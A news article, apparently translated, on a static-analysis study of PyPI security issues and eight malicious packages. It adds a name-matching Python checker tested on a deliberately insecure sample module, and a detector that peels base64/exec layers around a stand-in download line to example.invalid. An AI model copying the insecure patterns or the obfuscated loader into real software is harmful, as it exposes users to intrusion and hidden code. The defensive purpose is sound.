A group of researchers from the University of Turku (Finland) has published the results of an analysis of packages in the PyPI repository for potentially dangerous constructs that can lead to vulnerabilities. Across the 197 thousand packages analysed, 749 thousand security issues were identified, and 46% of packages have at least one issue. The most common issues are flaws in exception handling and the use of constructs that allow code injection.
Of the 749 thousand issues identified, 442 thousand (41%) were classed as minor, 227 thousand (30%) as medium severity and 80 thousand (11%) as dangerous. Some packages stand out with thousands of issues: 2589 issues were reported in the PyGGI package, mostly due to the use of the "try-except-pass" construct, and 2356 in the appengine-sdk package. Large numbers of issues were also found in the genie.libs.ops, pbcore and genie.libs.parser packages.
It should be noted that the results come from automated static analysis, which does not take into account the context in which a given construct is used. The developer of the bandit toolkit, which was used to scan the code, expressed the view that, given the high rate of false positives, scan results cannot be treated as vulnerabilities outright without additional manual review of each finding.
For example, the analyzer treats the use of non-cryptographic random number generators and of hash algorithms such as MD5 as a security problem, whereas in code such algorithms may serve purposes that have no bearing on security. Likewise, the analyzer treats any handling of external data in unsafe functions such as pickle, yaml.load, subprocess and eval as a problem, but such use does not by itself constitute a vulnerability: these functions can be used without creating a security risk, for instance when the data never comes from an untrusted source.
Among the checks used in the study:
- Use of potentially unsafe functions such as exec, mktemp, eval, mark_safe, etc.
- Insecure file access permissions.
- Binding a network socket to all network interfaces.
- Passwords and keys hardcoded in the source.
- Use of a predefined temporary directory.
- Use of pass and continue in catch-all exception handlers.
- Launching a Flask-based web application with debug mode enabled.
- Use of unsafe deserialization methods.
- Use of the MD2, MD4, MD5 and SHA1 hash functions.
- Use of the insecure DES cipher and of insecure encryption modes.
- Use of the HTTPSConnection implementation that is insecure in some Python versions.
- Passing the file:// scheme to urlopen.
- Use of pseudorandom number generators for cryptographic operations.
- Use of the Telnet protocol.
- Use of unsafe XML parsers.
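To make the context-free matching discussed above concrete, and to show several of the listed checks in code, here is an added example: a small AST-based checker in Python that reproduces a handful of those checks by matching names and keyword arguments only, run against a constructed sample module. It is not code from the study, from bandit or from the original article; the function names, the LOW/MEDIUM/HIGH grading and the variable-name heuristic for hardcoded secrets are the example's own. The sample mixes real problems (a hardcoded password, `shell=True`, a socket bound to all interfaces, a catch-all handler that only passes) with uses that are harmless in context (MD5 as a cache key, `yaml.load` that already passes `SafeLoader`), so the false-positive problem is visible in the findings.

```python
from __future__ import annotations
import ast
from collections import Counter
from dataclasses import dataclass

@dataclass
class Finding:
    line: int
    severity: str  # LOW / MEDIUM / HIGH; the grading here is the example's own
    message: str

# Calls matched purely by name, with no data flow or context: this is what makes
# "MD5 used for a cache key" or "yaml.load with SafeLoader" show up as findings.
RISKY_CALLS = {
    "eval": ("MEDIUM", "use of eval()"),
    "exec": ("MEDIUM", "use of exec()"),
    "pickle.loads": ("MEDIUM", "unsafe deserialization: pickle.loads"),
    "yaml.load": ("MEDIUM", "yaml.load (matched by name even when SafeLoader is passed)"),
    "hashlib.md5": ("MEDIUM", "weak hash: MD5"),
    "telnetlib.Telnet": ("HIGH", "use of the Telnet protocol"),
}

def _call_name(node: ast.Call) -> str | None:
    """'name' or 'module.name' for simple call targets, None for anything else."""
    func = node.func
    if isinstance(func, ast.Name):
        return func.id
    if isinstance(func, ast.Attribute) and isinstance(func.value, ast.Name):
        return f"{func.value.id}.{func.attr}"
    return None

def _keyword_is_true(node: ast.Call, name: str) -> bool:
    return any(kw.arg == name and isinstance(kw.value, ast.Constant) and kw.value.value is True
               for kw in node.keywords)

class Checker(ast.NodeVisitor):
    def __init__(self) -> None:
        self.findings: list[Finding] = []

    def visit_Call(self, node: ast.Call) -> None:
        name = _call_name(node)
        if name in RISKY_CALLS:
            self.findings.append(Finding(node.lineno, *RISKY_CALLS[name]))
        if name and name.startswith("subprocess.") and _keyword_is_true(node, "shell"):
            self.findings.append(Finding(node.lineno, "HIGH", "subprocess call with shell=True"))
        if isinstance(node.func, ast.Attribute):
            if node.func.attr == "run" and _keyword_is_true(node, "debug"):
                self.findings.append(Finding(node.lineno, "HIGH", "web app started with debug=True"))
            if node.func.attr == "bind" and node.args:
                addr = node.args[0]
                host = addr.elts[0] if isinstance(addr, ast.Tuple) and addr.elts else None
                if isinstance(host, ast.Constant) and host.value in ("0.0.0.0", "", "::"):
                    self.findings.append(Finding(node.lineno, "MEDIUM", "socket bound to all interfaces"))
        self.generic_visit(node)

    def visit_Try(self, node: ast.Try) -> None:
        for h in node.handlers:
            catch_all = h.type is None or (isinstance(h.type, ast.Name)
                                           and h.type.id in ("Exception", "BaseException"))
            only_skip = len(h.body) == 1 and isinstance(h.body[0], (ast.Pass, ast.Continue))
            if catch_all and only_skip:
                self.findings.append(Finding(h.lineno, "LOW", "catch-all handler that only passes/continues"))
        self.generic_visit(node)

    def visit_Assign(self, node: ast.Assign) -> None:
        # Name-based heuristic for hardcoded secrets (the example's own, deliberately crude).
        if isinstance(node.value, ast.Constant) and isinstance(node.value.value, str):
            for t in node.targets:
                if isinstance(t, ast.Name) and any(w in t.id.lower() for w in ("password", "secret", "token")):
                    self.findings.append(Finding(node.lineno, "LOW", f"hardcoded secret in variable {t.id}"))
        self.generic_visit(node)

def scan(source: str) -> list[Finding]:
    checker = Checker()
    checker.visit(ast.parse(source))
    return sorted(checker.findings, key=lambda f: f.line)

def count_by_severity(findings: list[Finding]) -> dict[str, int]:
    return dict(Counter(f.severity for f in findings))

# Constructed sample module (not from any real package).  Lines 3, 11, 12 and 15 are real
# problems, line 9 only if blob is untrusted; lines 5 (MD5 as a cache key) and 7 (yaml.load
# that already passes SafeLoader) are flagged purely because matching is by name.
SAMPLE = '''
import hashlib, pickle, subprocess, yaml, socket
password = "hunter2"
def cache_key(path):
    return hashlib.md5(path.encode()).hexdigest()
def load_config(text):
    return yaml.load(text, Loader=yaml.SafeLoader)
def load_state(blob):
    return pickle.loads(blob)
def run(cmd):
    subprocess.run(cmd, shell=True)
socket.socket().bind(("0.0.0.0", 8080))
try:
    run("ls")
except Exception:
    pass
'''
```

Running `scan(SAMPLE)` yields seven findings (two LOW, four MEDIUM, one HIGH), of which the MD5 and `yaml.load` hits are the kind of context-free false positive the bandit developer warns about. A production scanner can be given some of that context: bandit's hash check skips `hashlib.md5(..., usedforsecurity=False)` (Python 3.9+) and its YAML check recognises `Loader=yaml.SafeLoader`; the example omits such rules on purpose to show what name matching alone produces.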
In addition, 8 malicious packages were found in the PyPI repository. Before their removal, the offending packages had been downloaded more than 30 thousand times. To conceal the malicious activity and evade warnings from simple static analyzers, code blocks were encoded in Base64 and executed after decoding via an eval call.
The noblesse, genesisbot, suffer, noblesse2 and noblessev2 packages contained code to harvest credit card numbers and passwords stored in the Chrome and Edge browsers, to exfiltrate Discord account tokens and to send system information, including screenshots. The pytagora and pytagora2 packages included the ability to download and execute third-party executable code.
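The Base64-and-eval trick described above defeats a scanner that stops at an opaque string literal, but a scanner can follow the decode statically. The following Python is an added example, not code from the article, from the malicious packages or from any real scanner: it finds `eval()`/`exec()` calls whose argument is `base64.b64decode()` of a literal, decodes that literal, and repeats the search on the decoded text until plain code remains, so nested layers are peeled one by one. The sample it runs on is constructed here: an inert two-layer wrapper around a harmless stand-in for a download line, using the reserved hostname example.invalid; nothing in it is executed, and `wrap_layer`, `find_encoded_exec` and `peel_layers` are the example's own names.

```python
from __future__ import annotations
import ast
import base64

def _dotted(node: ast.AST) -> str | None:
    """'base64.b64decode' for Name/Attribute chains, None for anything else."""
    if isinstance(node, ast.Name):
        return node.id
    if isinstance(node, ast.Attribute):
        base = _dotted(node.value)
        return f"{base}.{node.attr}" if base else None
    return None

def find_encoded_exec(source: str) -> list[tuple[int, str | None]]:
    """Locate eval()/exec() calls whose argument is base64.b64decode(<literal>),
    optionally wrapped in .decode(), and decode the literal statically.
    Returns (line, decoded source) pairs; decoded is None when the literal is not
    valid base64, which is itself worth a closer look."""
    hits: list[tuple[int, str | None]] = []
    for node in ast.walk(ast.parse(source)):
        if not (isinstance(node, ast.Call) and _dotted(node.func) in ("eval", "exec") and node.args):
            continue
        arg = node.args[0]
        if isinstance(arg, ast.Call) and isinstance(arg.func, ast.Attribute) and arg.func.attr == "decode":
            arg = arg.func.value  # eval(b64decode(x).decode()) -> b64decode(x)
        if not (isinstance(arg, ast.Call) and _dotted(arg.func) in ("base64.b64decode", "b64decode")
                and arg.args and isinstance(arg.args[0], ast.Constant)
                and isinstance(arg.args[0].value, (str, bytes))):
            continue
        try:
            decoded = base64.b64decode(arg.args[0].value, validate=True).decode("utf-8", "replace")
        except ValueError:  # binascii.Error is a ValueError subclass
            decoded = None
        hits.append((node.lineno, decoded))
    return hits

def peel_layers(source: str, max_depth: int = 8) -> list[str]:
    """Follow nested eval/exec(base64) layers and return each decoded layer,
    innermost last.  Stops at max_depth, at an undecodable literal, or when the
    remaining code contains no such call."""
    layers: list[str] = []
    current = source
    for _ in range(max_depth):
        hits = find_encoded_exec(current)
        if not hits or hits[0][1] is None:
            break
        current = hits[0][1]
        layers.append(current)
    return layers

def wrap_layer(code: str) -> str:
    """Build one obfuscation layer of the kind described above.  Used here only to
    construct the sample; the wrapped text is never executed."""
    blob = base64.b64encode(code.encode()).decode()
    return f'import base64\nexec(base64.b64decode("{blob}").decode())\n'

# Constructed stand-in for a stage-2 download line; example.invalid is a reserved
# name (RFC 2606) and nothing here is ever run.
PAYLOAD = 'import urllib.request\nurllib.request.urlopen("http://example.invalid/stage2")\n'
OBFUSCATED = wrap_layer(wrap_layer(PAYLOAD))  # two layers, so the peel has to repeat

if __name__ == "__main__":
    print("plain-text search for 'urlopen' in the package source:", "urlopen" in OBFUSCATED)
    for depth, layer in enumerate(peel_layers(OBFUSCATED), 1):
        print(f"--- decoded layer {depth} ---\n{layer}")
```

A plain-text search of `OBFUSCATED` for `urlopen` finds nothing, while `peel_layers` returns two layers with the original download line in the last one. The same walk can feed each decoded layer back into an ordinary checker; and an `eval`/`exec` whose argument is not valid base64 at all, or is built at runtime rather than from a literal, is a finding in its own right rather than something to skip.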
Source: opennet.ru